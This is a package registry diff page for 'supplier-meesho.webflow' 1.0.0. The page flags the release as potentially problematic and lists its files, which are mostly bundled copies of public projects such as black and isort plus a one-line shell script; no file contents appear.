supplier-meesho.webflow 1.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of supplier-meesho.webflow might be problematic. Click here for more details.
- package/.localized +0 -0
- package/2.sh +1 -0
- package/Complaince.pdf +0 -0
- package/GitRepos/CircleIndicator/.idea/caches/build_file_checksums.ser +0 -0
- package/GitRepos/CircleIndicator/.idea/caches/gradle_models.ser +0 -0
- package/GitRepos/CircleIndicator/.idea/checkstyle-idea.xml +16 -0
- package/GitRepos/CircleIndicator/.idea/compiler.xml +21 -0
- package/GitRepos/CircleIndicator/.idea/copyright/profiles_settings.xml +3 -0
- package/GitRepos/CircleIndicator/.idea/encodings.xml +6 -0
- package/GitRepos/CircleIndicator/.idea/gradle.xml +23 -0
- package/GitRepos/CircleIndicator/.idea/misc.xml +93 -0
- package/GitRepos/CircleIndicator/.idea/modules.xml +11 -0
- package/GitRepos/CircleIndicator/.idea/runConfigurations.xml +12 -0
- package/GitRepos/CircleIndicator/.idea/vcs.xml +6 -0
- package/GitRepos/CircleIndicator/CHANGELOG.md +62 -0
- package/GitRepos/CircleIndicator/LoopingViewPager/README.md +4 -0
- package/GitRepos/CircleIndicator/LoopingViewPager/build.gradle +22 -0
- package/GitRepos/CircleIndicator/LoopingViewPager/proguard-rules.pro +17 -0
- package/GitRepos/CircleIndicator/LoopingViewPager/src/main/AndroidManifest.xml +5 -0
- package/GitRepos/CircleIndicator/LoopingViewPager/src/main/java/com/imbryk/viewPager/LoopPagerAdapterWrapper.java +168 -0
- package/GitRepos/CircleIndicator/LoopingViewPager/src/main/java/com/imbryk/viewPager/LoopViewPager.java +208 -0
- package/GitRepos/CircleIndicator/README.md +73 -0
- package/GitRepos/CircleIndicator/apk/sample.apk +0 -0
- package/GitRepos/CircleIndicator/build.gradle +20 -0
- package/GitRepos/CircleIndicator/circleindicator/build.gradle +30 -0
- package/GitRepos/CircleIndicator/circleindicator/gradle.properties +22 -0
- package/GitRepos/CircleIndicator/circleindicator/proguard-rules.pro +17 -0
- package/GitRepos/CircleIndicator/circleindicator/src/main/AndroidManifest.xml +5 -0
- package/GitRepos/CircleIndicator/circleindicator/src/main/java/me/relex/circleindicator/CircleIndicator.java +323 -0
- package/GitRepos/CircleIndicator/circleindicator/src/main/java/me/relex/circleindicator/SnackbarBehavior.java +45 -0
- package/GitRepos/CircleIndicator/circleindicator/src/main/res/animator/scale_with_alpha.xml +22 -0
- package/GitRepos/CircleIndicator/circleindicator/src/main/res/drawable/white_radius.xml +6 -0
- package/GitRepos/CircleIndicator/circleindicator/src/main/res/values/attrs.xml +60 -0
- package/GitRepos/CircleIndicator/circleindicator/upload-jcenter.gradle +67 -0
- package/GitRepos/CircleIndicator/circleindicator/upload-maven.gradle +55 -0
- package/GitRepos/CircleIndicator/gradle/wrapper/gradle-wrapper.jar +0 -0
- package/GitRepos/CircleIndicator/gradle/wrapper/gradle-wrapper.properties +6 -0
- package/GitRepos/CircleIndicator/gradle.properties +18 -0
- package/GitRepos/CircleIndicator/gradlew +164 -0
- package/GitRepos/CircleIndicator/gradlew.bat +90 -0
- package/GitRepos/CircleIndicator/sample/build.gradle +32 -0
- package/GitRepos/CircleIndicator/sample/proguard-rules.pro +17 -0
- package/GitRepos/CircleIndicator/sample/src/main/AndroidManifest.xml +23 -0
- package/GitRepos/CircleIndicator/sample/src/main/java/me/relex/circleindicator/sample/SampleActivity.java +158 -0
- package/GitRepos/CircleIndicator/sample/src/main/java/me/relex/circleindicator/sample/SamplePagerAdapter.java +59 -0
- package/GitRepos/CircleIndicator/sample/src/main/java/me/relex/circleindicator/sample/fragment/ChangeColorFragment.java +28 -0
- package/GitRepos/CircleIndicator/sample/src/main/java/me/relex/circleindicator/sample/fragment/CustomAnimationFragment.java +28 -0
- package/GitRepos/CircleIndicator/sample/src/main/java/me/relex/circleindicator/sample/fragment/DefaultFragment.java +29 -0
- package/GitRepos/CircleIndicator/sample/src/main/java/me/relex/circleindicator/sample/fragment/DynamicAdapterFragment.java +52 -0
- package/GitRepos/CircleIndicator/sample/src/main/java/me/relex/circleindicator/sample/fragment/LoopViewPagerFragment.java +28 -0
- package/GitRepos/CircleIndicator/sample/src/main/java/me/relex/circleindicator/sample/fragment/ResetAdapterFragment.java +41 -0
- package/GitRepos/CircleIndicator/sample/src/main/java/me/relex/circleindicator/sample/fragment/SnackbarBehaviorFragment.java +44 -0
- package/GitRepos/CircleIndicator/sample/src/main/res/animator/indicator_animator.xml +16 -0
- package/GitRepos/CircleIndicator/sample/src/main/res/animator/indicator_animator_reverse.xml +10 -0
- package/GitRepos/CircleIndicator/sample/src/main/res/animator/indicator_no_animator.xml +4 -0
- package/GitRepos/CircleIndicator/sample/src/main/res/drawable/black_radius.xml +8 -0
- package/GitRepos/CircleIndicator/sample/src/main/res/drawable/black_radius_square.xml +7 -0
- package/GitRepos/CircleIndicator/sample/src/main/res/drawable/white_radius.xml +6 -0
- package/GitRepos/CircleIndicator/sample/src/main/res/drawable-hdpi/ic_launcher.png +0 -0
- package/GitRepos/CircleIndicator/sample/src/main/res/drawable-mdpi/ic_launcher.png +0 -0
- package/GitRepos/CircleIndicator/sample/src/main/res/drawable-xhdpi/ic_launcher.png +0 -0
- package/GitRepos/CircleIndicator/sample/src/main/res/drawable-xxhdpi/ic_launcher.png +0 -0
- package/GitRepos/CircleIndicator/sample/src/main/res/layout/activity_sample.xml +22 -0
- package/GitRepos/CircleIndicator/sample/src/main/res/layout/fragment_sample_change_color.xml +21 -0
- package/GitRepos/CircleIndicator/sample/src/main/res/layout/fragment_sample_custom_animation.xml +26 -0
- package/GitRepos/CircleIndicator/sample/src/main/res/layout/fragment_sample_default.xml +18 -0
- package/GitRepos/CircleIndicator/sample/src/main/res/layout/fragment_sample_dynamic_adapter.xml +34 -0
- package/GitRepos/CircleIndicator/sample/src/main/res/layout/fragment_sample_loop_viewpager.xml +18 -0
- package/GitRepos/CircleIndicator/sample/src/main/res/layout/fragment_sample_reset_adapter.xml +27 -0
- package/GitRepos/CircleIndicator/sample/src/main/res/layout/fragment_sample_snackbar_behavior.xml +28 -0
- package/GitRepos/CircleIndicator/sample/src/main/res/layout/item_view.xml +2 -0
- package/GitRepos/CircleIndicator/sample/src/main/res/layout/viewpager_activity.xml +74 -0
- package/GitRepos/CircleIndicator/sample/src/main/res/values/array.xml +10 -0
- package/GitRepos/CircleIndicator/sample/src/main/res/values/colors.xml +19 -0
- package/GitRepos/CircleIndicator/sample/src/main/res/values/ids.xml +17 -0
- package/GitRepos/CircleIndicator/sample/src/main/res/values/strings.xml +9 -0
- package/GitRepos/CircleIndicator/sample/src/main/res/values/styles.xml +26 -0
- package/GitRepos/CircleIndicator/screenshot.gif +0 -0
- package/GitRepos/CircleIndicator/settings.gradle +1 -0
- package/GitRepos/Time/.travis.yml +14 -0
- package/GitRepos/Time/LICENSE.md +22 -0
- package/GitRepos/Time/README.md +269 -0
- package/GitRepos/Time/build.gradle +23 -0
- package/GitRepos/Time/gradle/wrapper/gradle-wrapper.jar +0 -0
- package/GitRepos/Time/gradle/wrapper/gradle-wrapper.properties +6 -0
- package/GitRepos/Time/gradlew +172 -0
- package/GitRepos/Time/gradlew.bat +84 -0
- package/GitRepos/Time/settings.gradle +3 -0
- package/GitRepos/Time/time/build.gradle +20 -0
- package/GitRepos/Time/time/src/main/kotlin/com/kizitonwose/time/Extensions.kt +65 -0
- package/GitRepos/Time/time/src/main/kotlin/com/kizitonwose/time/Time.kt +143 -0
- package/GitRepos/Time/time/src/test/kotlin/com/kizitonwose/time/TimeTest.kt +110 -0
- package/GitRepos/Time/time-android/build.gradle +38 -0
- package/GitRepos/Time/time-android/proguard-rules.pro +21 -0
- package/GitRepos/Time/time-android/src/main/AndroidManifest.xml +2 -0
- package/GitRepos/Time/time-android/src/main/kotlin/com/kizitonwose/timeandroid/AndroidExtensions.kt +15 -0
- package/GitRepos/Time/time-android/src/main/res/values/strings.xml +3 -0
- package/GitRepos/black/.coveragerc +9 -0
- package/GitRepos/black/.flake8 +7 -0
- package/GitRepos/black/.github/CODE_OF_CONDUCT.md +11 -0
- package/GitRepos/black/.github/ISSUE_TEMPLATE/bug_report.md +36 -0
- package/GitRepos/black/.github/ISSUE_TEMPLATE/feature_request.md +19 -0
- package/GitRepos/black/.github/ISSUE_TEMPLATE/style_issue.md +29 -0
- package/GitRepos/black/.github/workflows/changelog.yml +21 -0
- package/GitRepos/black/.github/workflows/doc.yml +30 -0
- package/GitRepos/black/.github/workflows/docker.yml +43 -0
- package/GitRepos/black/.github/workflows/fuzz.yml +35 -0
- package/GitRepos/black/.github/workflows/lint.yml +28 -0
- package/GitRepos/black/.github/workflows/primer.yml +47 -0
- package/GitRepos/black/.github/workflows/pypi_upload.yml +31 -0
- package/GitRepos/black/.github/workflows/test.yml +76 -0
- package/GitRepos/black/.github/workflows/upload_binary.yml +51 -0
- package/GitRepos/black/.pre-commit-config.yaml +30 -0
- package/GitRepos/black/.pre-commit-hooks.yaml +9 -0
- package/GitRepos/black/.prettierrc.yaml +3 -0
- package/GitRepos/black/.readthedocs.yaml +14 -0
- package/GitRepos/black/AUTHORS.md +184 -0
- package/GitRepos/black/CHANGES.md +648 -0
- package/GitRepos/black/CONTRIBUTING.md +10 -0
- package/GitRepos/black/Dockerfile +14 -0
- package/GitRepos/black/LICENSE +21 -0
- package/GitRepos/black/Pipfile +36 -0
- package/GitRepos/black/Pipfile.lock +1308 -0
- package/GitRepos/black/README.md +220 -0
- package/GitRepos/black/action/Dockerfile +10 -0
- package/GitRepos/black/action/entrypoint.sh +9 -0
- package/GitRepos/black/action.yml +24 -0
- package/GitRepos/black/autoload/black.vim +172 -0
- package/GitRepos/black/docs/Makefile +20 -0
- package/GitRepos/black/docs/_static/custom.css +38 -0
- package/GitRepos/black/docs/_static/license.svg +1 -0
- package/GitRepos/black/docs/_static/logo2-readme.png +0 -0
- package/GitRepos/black/docs/_static/logo2.png +0 -0
- package/GitRepos/black/docs/_static/pypi_template.svg +1 -0
- package/GitRepos/black/docs/compatible_configs/flake8/.flake8 +3 -0
- package/GitRepos/black/docs/compatible_configs/flake8/setup.cfg +3 -0
- package/GitRepos/black/docs/compatible_configs/flake8/tox.ini +3 -0
- package/GitRepos/black/docs/compatible_configs/isort/.editorconfig +2 -0
- package/GitRepos/black/docs/compatible_configs/isort/.isort.cfg +2 -0
- package/GitRepos/black/docs/compatible_configs/isort/pyproject.toml +2 -0
- package/GitRepos/black/docs/compatible_configs/isort/setup.cfg +2 -0
- package/GitRepos/black/docs/compatible_configs/pylint/pylintrc +5 -0
- package/GitRepos/black/docs/compatible_configs/pylint/pyproject.toml +5 -0
- package/GitRepos/black/docs/compatible_configs/pylint/setup.cfg +5 -0
- package/GitRepos/black/docs/conf.py +227 -0
- package/GitRepos/black/docs/contributing/gauging_changes.md +42 -0
- package/GitRepos/black/docs/contributing/index.rst +42 -0
- package/GitRepos/black/docs/contributing/issue_triage.md +169 -0
- package/GitRepos/black/docs/contributing/reference/reference_classes.rst +76 -0
- package/GitRepos/black/docs/contributing/reference/reference_exceptions.rst +12 -0
- package/GitRepos/black/docs/contributing/reference/reference_functions.rst +178 -0
- package/GitRepos/black/docs/contributing/reference/reference_summary.rst +16 -0
- package/GitRepos/black/docs/contributing/release_process.md +89 -0
- package/GitRepos/black/docs/contributing/the_basics.md +101 -0
- package/GitRepos/black/docs/getting_started.md +49 -0
- package/GitRepos/black/docs/guides/index.rst +14 -0
- package/GitRepos/black/docs/guides/introducing_black_to_your_project.md +50 -0
- package/GitRepos/black/docs/guides/using_black_with_other_tools.md +278 -0
- package/GitRepos/black/docs/index.rst +120 -0
- package/GitRepos/black/docs/integrations/editors.md +326 -0
- package/GitRepos/black/docs/integrations/github_actions.md +35 -0
- package/GitRepos/black/docs/integrations/index.rst +28 -0
- package/GitRepos/black/docs/integrations/source_version_control.md +14 -0
- package/GitRepos/black/docs/license.rst +6 -0
- package/GitRepos/black/docs/make.bat +36 -0
- package/GitRepos/black/docs/requirements.txt +6 -0
- package/GitRepos/black/docs/the_black_code_style/current_style.md +456 -0
- package/GitRepos/black/docs/the_black_code_style/future_style.md +35 -0
- package/GitRepos/black/docs/the_black_code_style/index.rst +19 -0
- package/GitRepos/black/docs/usage_and_configuration/black_as_a_server.md +78 -0
- package/GitRepos/black/docs/usage_and_configuration/file_collection_and_discovery.md +36 -0
- package/GitRepos/black/docs/usage_and_configuration/index.rst +24 -0
- package/GitRepos/black/docs/usage_and_configuration/the_basics.md +286 -0
- package/GitRepos/black/fuzz.py +85 -0
- package/GitRepos/black/gallery/Dockerfile +11 -0
- package/GitRepos/black/gallery/README.md +45 -0
- package/GitRepos/black/gallery/gallery.py +307 -0
- package/GitRepos/black/mypy.ini +39 -0
- package/GitRepos/black/plugin/black.vim +60 -0
- package/GitRepos/black/profiling/dict_big.py +8001 -0
- package/GitRepos/black/profiling/dict_huge.py +41440 -0
- package/GitRepos/black/profiling/list_big.py +4000 -0
- package/GitRepos/black/profiling/list_huge.py +22431 -0
- package/GitRepos/black/profiling/mix_big.py +1002 -0
- package/GitRepos/black/profiling/mix_huge.py +7692 -0
- package/GitRepos/black/profiling/mix_small.py +102 -0
- package/GitRepos/black/pyproject.toml +34 -0
- package/GitRepos/black/setup.cfg +2 -0
- package/GitRepos/black/setup.py +113 -0
- package/GitRepos/black/src/black/__init__.py +1062 -0
- package/GitRepos/black/src/black/__main__.py +3 -0
- package/GitRepos/black/src/black/brackets.py +334 -0
- package/GitRepos/black/src/black/cache.py +83 -0
- package/GitRepos/black/src/black/comments.py +269 -0
- package/GitRepos/black/src/black/concurrency.py +39 -0
- package/GitRepos/black/src/black/const.py +4 -0
- package/GitRepos/black/src/black/debug.py +48 -0
- package/GitRepos/black/src/black/files.py +243 -0
- package/GitRepos/black/src/black/linegen.py +984 -0
- package/GitRepos/black/src/black/lines.py +734 -0
- package/GitRepos/black/src/black/mode.py +123 -0
- package/GitRepos/black/src/black/nodes.py +843 -0
- package/GitRepos/black/src/black/numerics.py +65 -0
- package/GitRepos/black/src/black/output.py +83 -0
- package/GitRepos/black/src/black/parsing.py +215 -0
- package/GitRepos/black/src/black/py.typed +1 -0
- package/GitRepos/black/src/black/report.py +100 -0
- package/GitRepos/black/src/black/rusty.py +28 -0
- package/GitRepos/black/src/black/strings.py +216 -0
- package/GitRepos/black/src/black/trans.py +1925 -0
- package/GitRepos/black/src/black_primer/cli.py +147 -0
- package/GitRepos/black/src/black_primer/lib.py +361 -0
- package/GitRepos/black/src/black_primer/primer.json +143 -0
- package/GitRepos/black/src/blackd/__init__.py +211 -0
- package/GitRepos/black/src/blib2to3/Grammar.txt +215 -0
- package/GitRepos/black/src/blib2to3/LICENSE +254 -0
- package/GitRepos/black/src/blib2to3/PatternGrammar.txt +28 -0
- package/GitRepos/black/src/blib2to3/README +16 -0
- package/GitRepos/black/src/blib2to3/__init__.py +1 -0
- package/GitRepos/black/src/blib2to3/pgen2/__init__.py +4 -0
- package/GitRepos/black/src/blib2to3/pgen2/conv.py +256 -0
- package/GitRepos/black/src/blib2to3/pgen2/driver.py +253 -0
- package/GitRepos/black/src/blib2to3/pgen2/grammar.py +223 -0
- package/GitRepos/black/src/blib2to3/pgen2/literals.py +68 -0
- package/GitRepos/black/src/blib2to3/pgen2/parse.py +235 -0
- package/GitRepos/black/src/blib2to3/pgen2/pgen.py +428 -0
- package/GitRepos/black/src/blib2to3/pgen2/token.py +94 -0
- package/GitRepos/black/src/blib2to3/pgen2/tokenize.py +681 -0
- package/GitRepos/black/src/blib2to3/pygram.py +197 -0
- package/GitRepos/black/src/blib2to3/pytree.py +980 -0
- package/GitRepos/black/test_requirements.txt +9 -0
- package/GitRepos/black/tests/__init__.py +0 -0
- package/GitRepos/black/tests/conftest.py +1 -0
- package/GitRepos/black/tests/data/async_as_identifier.py +49 -0
- package/GitRepos/black/tests/data/beginning_backslash.py +12 -0
- package/GitRepos/black/tests/data/blackd_diff.diff +13 -0
- package/GitRepos/black/tests/data/blackd_diff.py +6 -0
- package/GitRepos/black/tests/data/bracketmatch.py +15 -0
- package/GitRepos/black/tests/data/cantfit.py +107 -0
- package/GitRepos/black/tests/data/class_blank_parentheses.py +58 -0
- package/GitRepos/black/tests/data/class_methods_new_line.py +270 -0
- package/GitRepos/black/tests/data/collections.py +174 -0
- package/GitRepos/black/tests/data/comment_after_escaped_newline.py +18 -0
- package/GitRepos/black/tests/data/comments.py +96 -0
- package/GitRepos/black/tests/data/comments2.py +342 -0
- package/GitRepos/black/tests/data/comments3.py +47 -0
- package/GitRepos/black/tests/data/comments4.py +94 -0
- package/GitRepos/black/tests/data/comments5.py +71 -0
- package/GitRepos/black/tests/data/comments6.py +118 -0
- package/GitRepos/black/tests/data/comments7.py +271 -0
- package/GitRepos/black/tests/data/comments_non_breaking_space.py +44 -0
- package/GitRepos/black/tests/data/composition.py +181 -0
- package/GitRepos/black/tests/data/composition_no_trailing_comma.py +367 -0
- package/GitRepos/black/tests/data/debug_visitor.out +810 -0
- package/GitRepos/black/tests/data/debug_visitor.py +32 -0
- package/GitRepos/black/tests/data/decorators.py +182 -0
- package/GitRepos/black/tests/data/docstring.py +377 -0
- package/GitRepos/black/tests/data/docstring_no_string_normalization.py +249 -0
- package/GitRepos/black/tests/data/empty_lines.py +187 -0
- package/GitRepos/black/tests/data/empty_pyproject.toml +2 -0
- package/GitRepos/black/tests/data/expression.diff +447 -0
- package/GitRepos/black/tests/data/expression.py +630 -0
- package/GitRepos/black/tests/data/expression_skip_magic_trailing_comma.diff +428 -0
- package/GitRepos/black/tests/data/fmtonoff.py +413 -0
- package/GitRepos/black/tests/data/fmtonoff2.py +40 -0
- package/GitRepos/black/tests/data/fmtonoff3.py +35 -0
- package/GitRepos/black/tests/data/fmtonoff4.py +36 -0
- package/GitRepos/black/tests/data/fmtskip.py +3 -0
- package/GitRepos/black/tests/data/fmtskip2.py +17 -0
- package/GitRepos/black/tests/data/fmtskip3.py +20 -0
- package/GitRepos/black/tests/data/fmtskip4.py +13 -0
- package/GitRepos/black/tests/data/fmtskip5.py +22 -0
- package/GitRepos/black/tests/data/force_py36.py +16 -0
- package/GitRepos/black/tests/data/force_pyi.py +65 -0
- package/GitRepos/black/tests/data/fstring.py +21 -0
- package/GitRepos/black/tests/data/function.py +247 -0
- package/GitRepos/black/tests/data/function2.py +58 -0
- package/GitRepos/black/tests/data/function_trailing_comma.py +88 -0
- package/GitRepos/black/tests/data/import_spacing.py +118 -0
- package/GitRepos/black/tests/data/include_exclude_tests/b/.definitely_exclude/a.pie +0 -0
- package/GitRepos/black/tests/data/include_exclude_tests/b/.definitely_exclude/a.py +0 -0
- package/GitRepos/black/tests/data/include_exclude_tests/b/.definitely_exclude/a.pyi +0 -0
- package/GitRepos/black/tests/data/include_exclude_tests/b/dont_exclude/a.pie +0 -0
- package/GitRepos/black/tests/data/include_exclude_tests/b/dont_exclude/a.py +0 -0
- package/GitRepos/black/tests/data/include_exclude_tests/b/dont_exclude/a.pyi +0 -0
- package/GitRepos/black/tests/data/include_exclude_tests/b/exclude/a.pie +0 -0
- package/GitRepos/black/tests/data/include_exclude_tests/b/exclude/a.py +0 -0
- package/GitRepos/black/tests/data/include_exclude_tests/b/exclude/a.pyi +0 -0
- package/GitRepos/black/tests/data/include_exclude_tests/pyproject.toml +3 -0
- package/GitRepos/black/tests/data/long_strings.py +589 -0
- package/GitRepos/black/tests/data/long_strings__edge_case.py +110 -0
- package/GitRepos/black/tests/data/long_strings__regression.py +888 -0
- package/GitRepos/black/tests/data/long_strings_flag_disabled.py +289 -0
- package/GitRepos/black/tests/data/missing_final_newline.diff +8 -0
- package/GitRepos/black/tests/data/missing_final_newline.py +3 -0
- package/GitRepos/black/tests/data/nested_gitignore_tests/pyproject.toml +3 -0
- package/GitRepos/black/tests/data/nested_gitignore_tests/root/b.py +1 -0
- package/GitRepos/black/tests/data/nested_gitignore_tests/root/c.py +1 -0
- package/GitRepos/black/tests/data/nested_gitignore_tests/root/child/c.py +1 -0
- package/GitRepos/black/tests/data/nested_gitignore_tests/x.py +0 -0
- package/GitRepos/black/tests/data/numeric_literals.py +44 -0
- package/GitRepos/black/tests/data/numeric_literals_py2.py +16 -0
- package/GitRepos/black/tests/data/numeric_literals_skip_underscores.py +23 -0
- package/GitRepos/black/tests/data/pep_570.py +44 -0
- package/GitRepos/black/tests/data/pep_572.py +47 -0
- package/GitRepos/black/tests/data/pep_572_do_not_remove_parens.py +21 -0
- package/GitRepos/black/tests/data/pep_572_remove_parens.py +105 -0
- package/GitRepos/black/tests/data/percent_precedence.py +41 -0
- package/GitRepos/black/tests/data/python2.py +33 -0
- package/GitRepos/black/tests/data/python2_print_function.py +16 -0
- package/GitRepos/black/tests/data/python2_unicode_literals.py +20 -0
- package/GitRepos/black/tests/data/python37.py +65 -0
- package/GitRepos/black/tests/data/python38.py +45 -0
- package/GitRepos/black/tests/data/python39.py +37 -0
- package/GitRepos/black/tests/data/remove_parens.py +142 -0
- package/GitRepos/black/tests/data/slices.py +31 -0
- package/GitRepos/black/tests/data/string_prefixes.py +18 -0
- package/GitRepos/black/tests/data/string_quotes.py +102 -0
- package/GitRepos/black/tests/data/stub.pyi +35 -0
- package/GitRepos/black/tests/data/trailing_comma_optional_parens1.py +3 -0
- package/GitRepos/black/tests/data/trailing_comma_optional_parens2.py +3 -0
- package/GitRepos/black/tests/data/trailing_comma_optional_parens3.py +8 -0
- package/GitRepos/black/tests/data/tricky_unicode_symbols.py +6 -0
- package/GitRepos/black/tests/data/tupleassign.py +23 -0
- package/GitRepos/black/tests/empty.toml +1 -0
- package/GitRepos/black/tests/optional.py +119 -0
- package/GitRepos/black/tests/test.toml +10 -0
- package/GitRepos/black/tests/test_black.py +2100 -0
- package/GitRepos/black/tests/test_blackd.py +166 -0
- package/GitRepos/black/tests/test_format.py +144 -0
- package/GitRepos/black/tests/test_primer.py +217 -0
- package/GitRepos/black/tests/util.py +74 -0
- package/GitRepos/black/tox.ini +28 -0
- package/GitRepos/danger-static_analyzer_comments/.idea/inspectionProfiles/Project_Default.xml +6 -0
- package/GitRepos/danger-static_analyzer_comments/.idea/modules.xml +8 -0
- package/GitRepos/danger-static_analyzer_comments/Gemfile +3 -0
- package/GitRepos/danger-static_analyzer_comments/Gemfile.lock +141 -0
- package/GitRepos/danger-static_analyzer_comments/Guardfile +19 -0
- package/GitRepos/danger-static_analyzer_comments/LICENSE +21 -0
- package/GitRepos/danger-static_analyzer_comments/PLUGIN.gemspec.template.cpgz +0 -0
- package/GitRepos/danger-static_analyzer_comments/PLUGIN_LICENSE.txt +22 -0
- package/GitRepos/danger-static_analyzer_comments/PLUGIN_README.md +20 -0
- package/GitRepos/danger-static_analyzer_comments/README.md +2 -0
- package/GitRepos/danger-static_analyzer_comments/Rakefile +23 -0
- package/GitRepos/danger-static_analyzer_comments/configure +123 -0
- package/GitRepos/danger-static_analyzer_comments/danger-static_analyzer_comments.gemspec +49 -0
- package/GitRepos/danger-static_analyzer_comments/lib/danger_plugin.rb +73 -0
- package/GitRepos/danger-static_analyzer_comments/lib/version.rb +3 -0
- package/GitRepos/danger-static_analyzer_comments/spec/danger_static_analyzer_comments_spec.rb +23 -0
- package/GitRepos/danger-static_analyzer_comments/spec/spec_helper.rb +65 -0
- package/GitRepos/isort/.codecov.yml +10 -0
- package/GitRepos/isort/.coveragerc +20 -0
- package/GitRepos/isort/.cruft.json +17 -0
- package/GitRepos/isort/.deepsource.toml +18 -0
- package/GitRepos/isort/.dockerignore +17 -0
- package/GitRepos/isort/.editorconfig +19 -0
- package/GitRepos/isort/.github/FUNDING.yml +2 -0
- package/GitRepos/isort/.github/workflows/integration.yml +35 -0
- package/GitRepos/isort/.github/workflows/lint.yml +35 -0
- package/GitRepos/isort/.github/workflows/test.yml +64 -0
- package/GitRepos/isort/.isort.cfg +5 -0
- package/GitRepos/isort/.pre-commit-config.yaml +5 -0
- package/GitRepos/isort/.pre-commit-hooks.yaml +9 -0
- package/GitRepos/isort/CHANGELOG.md +522 -0
- package/GitRepos/isort/Dockerfile +26 -0
- package/GitRepos/isort/LICENSE +21 -0
- package/GitRepos/isort/MANIFEST.in +4 -0
- package/GitRepos/isort/README.md +355 -0
- package/GitRepos/isort/art/isort_loves_black.png +0 -0
- package/GitRepos/isort/art/logo.png +0 -0
- package/GitRepos/isort/art/logo.xcf +0 -0
- package/GitRepos/isort/art/logo_5.png +0 -0
- package/GitRepos/isort/art/logo_large.png +0 -0
- package/GitRepos/isort/art/logo_large.xcf +0 -0
- package/GitRepos/isort/art/stylesheets/extra.css +5 -0
- package/GitRepos/isort/docs/configuration/action_comments.md +108 -0
- package/GitRepos/isort/docs/configuration/add_or_remove_imports.md +28 -0
- package/GitRepos/isort/docs/configuration/black_compatibility.md +63 -0
- package/GitRepos/isort/docs/configuration/config_files.md +89 -0
- package/GitRepos/isort/docs/configuration/custom_sections_and_ordering.md +131 -0
- package/GitRepos/isort/docs/configuration/git_hook.md +34 -0
- package/GitRepos/isort/docs/configuration/github_action.md +63 -0
- package/GitRepos/isort/docs/configuration/multi_line_output_modes.md +121 -0
- package/GitRepos/isort/docs/configuration/options.md +1314 -0
- package/GitRepos/isort/docs/configuration/pre-commit.md +32 -0
- package/GitRepos/isort/docs/configuration/profiles.md +86 -0
- package/GitRepos/isort/docs/configuration/setuptools_integration.md +27 -0
- package/GitRepos/isort/docs/contributing/1.-contributing-guide.md +81 -0
- package/GitRepos/isort/docs/contributing/2.-coding-standard.md +57 -0
- package/GitRepos/isort/docs/contributing/3.-code-of-conduct.md +88 -0
- package/GitRepos/isort/docs/contributing/4.-acknowledgements.md +259 -0
- package/GitRepos/isort/docs/major_releases/introducing_isort_5.md +142 -0
- package/GitRepos/isort/docs/major_releases/release_policy.md +46 -0
- package/GitRepos/isort/docs/quick_start/0.-try.md +50 -0
- package/GitRepos/isort/docs/quick_start/1.-install.md +22 -0
- package/GitRepos/isort/docs/quick_start/2.-cli.md +43 -0
- package/GitRepos/isort/docs/quick_start/3.-api.md +22 -0
- package/GitRepos/isort/docs/quick_start/interactive.css +26 -0
- package/GitRepos/isort/docs/quick_start/interactive.js +55 -0
- package/GitRepos/isort/docs/quick_start/isort-5.0.0-py3-none-any.whl +0 -0
- package/GitRepos/isort/docs/quick_start/isort-5.0.1-py3-none-any.whl +0 -0
- package/GitRepos/isort/docs/upgrade_guides/5.0.0.md +97 -0
- package/GitRepos/isort/docs/warning_and_error_codes/W0500.md +22 -0
- package/GitRepos/isort/example.gif +0 -0
- package/GitRepos/isort/example_isort_formatting_plugin/example_isort_formatting_plugin.py +23 -0
- package/GitRepos/isort/example_isort_formatting_plugin/poetry.lock +173 -0
- package/GitRepos/isort/example_isort_formatting_plugin/pyproject.toml +20 -0
- package/GitRepos/isort/example_shared_isort_profile/example_shared_isort_profile.py +7 -0
- package/GitRepos/isort/example_shared_isort_profile/poetry.lock +7 -0
- package/GitRepos/isort/example_shared_isort_profile/pyproject.toml +18 -0
- package/GitRepos/isort/isort/__init__.py +19 -0
- package/GitRepos/isort/isort/__main__.py +3 -0
- package/GitRepos/isort/isort/_future/__init__.py +12 -0
- package/GitRepos/isort/isort/_future/_dataclasses.py +1209 -0
- package/GitRepos/isort/isort/_vendored/toml/LICENSE +27 -0
- package/GitRepos/isort/isort/_vendored/toml/__init__.py +23 -0
- package/GitRepos/isort/isort/_vendored/toml/decoder.py +1053 -0
- package/GitRepos/isort/isort/_vendored/toml/encoder.py +295 -0
- package/GitRepos/isort/isort/_vendored/toml/ordered.py +13 -0
- package/GitRepos/isort/isort/_vendored/toml/tz.py +21 -0
- package/GitRepos/isort/isort/_version.py +1 -0
- package/GitRepos/isort/isort/api.py +576 -0
- package/GitRepos/isort/isort/comments.py +32 -0
- package/GitRepos/isort/isort/core.py +455 -0
- package/GitRepos/isort/isort/deprecated/__init__.py +0 -0
- package/GitRepos/isort/isort/deprecated/finders.py +415 -0
- package/GitRepos/isort/isort/exceptions.py +180 -0
- package/GitRepos/isort/isort/files.py +41 -0
- package/GitRepos/isort/isort/format.py +150 -0
- package/GitRepos/isort/isort/hooks.py +86 -0
- package/GitRepos/isort/isort/identify.py +206 -0
- package/GitRepos/isort/isort/io.py +73 -0
- package/GitRepos/isort/isort/literal.py +109 -0
- package/GitRepos/isort/isort/logo.py +19 -0
- package/GitRepos/isort/isort/main.py +1230 -0
- package/GitRepos/isort/isort/output.py +634 -0
- package/GitRepos/isort/isort/parse.py +569 -0
- package/GitRepos/isort/isort/place.py +145 -0
- package/GitRepos/isort/isort/profiles.py +86 -0
- package/GitRepos/isort/isort/py.typed +0 -0
- package/GitRepos/isort/isort/pylama_isort.py +43 -0
- package/GitRepos/isort/isort/sections.py +9 -0
- package/GitRepos/isort/isort/settings.py +779 -0
- package/GitRepos/isort/isort/setuptools_commands.py +61 -0
- package/GitRepos/isort/isort/sorting.py +118 -0
- package/GitRepos/isort/isort/stdlibs/__init__.py +2 -0
- package/GitRepos/isort/isort/stdlibs/all.py +3 -0
- package/GitRepos/isort/isort/stdlibs/py2.py +3 -0
- package/GitRepos/isort/isort/stdlibs/py27.py +300 -0
- package/GitRepos/isort/isort/stdlibs/py3.py +3 -0
- package/GitRepos/isort/isort/stdlibs/py35.py +222 -0
- package/GitRepos/isort/isort/stdlibs/py36.py +223 -0
- package/GitRepos/isort/isort/stdlibs/py37.py +224 -0
- package/GitRepos/isort/isort/stdlibs/py38.py +223 -0
- package/GitRepos/isort/isort/stdlibs/py39.py +223 -0
- package/GitRepos/isort/isort/utils.py +16 -0
- package/GitRepos/isort/isort/wrap.py +139 -0
